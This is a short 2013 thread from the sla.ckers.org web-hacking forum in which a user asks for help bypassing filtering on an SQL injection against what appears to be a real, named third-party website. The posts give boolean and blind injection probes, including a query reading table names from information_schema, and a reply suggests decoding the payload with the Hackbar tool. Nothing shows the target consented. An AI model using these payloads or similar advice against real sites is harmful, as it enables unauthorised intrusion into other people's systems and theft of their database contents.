Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Can you bypass this sql inject?
Posted by: secdragon
Date: June 05, 2013 05:40AM

http://www.maold.com/user.php?id=1

you can find that this place is real injectable.
http://www.maold.com/user.php?id=1 and 1=1
http://www.maold.com/user.php?id=1 and 1=2

but when you want to read data from database,you can see that:
view-source:http://www.maold.com/user.php?id=1%20%26%26%20AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

the sql become this:
SELECT * FROM data WHERE id=1 && AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

Is there anybody can help to bypass this?

Options: ReplyQuote
Re: Can you bypass this sql inject?
Posted by: hack2012
Date: June 05, 2013 10:57PM

楼主是中国的?

Options: ReplyQuote
Re: Can you bypass this sql inject?
Posted by: Vaibs
Date: June 14, 2013 09:46AM

Sad Man.
You should decode before executing it.Try using hackbar and run it again.
http://www.maold.com/user.php?id=1 && AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

Vaibs

Options: ReplyQuote


Sorry, only registered users may post in this forum.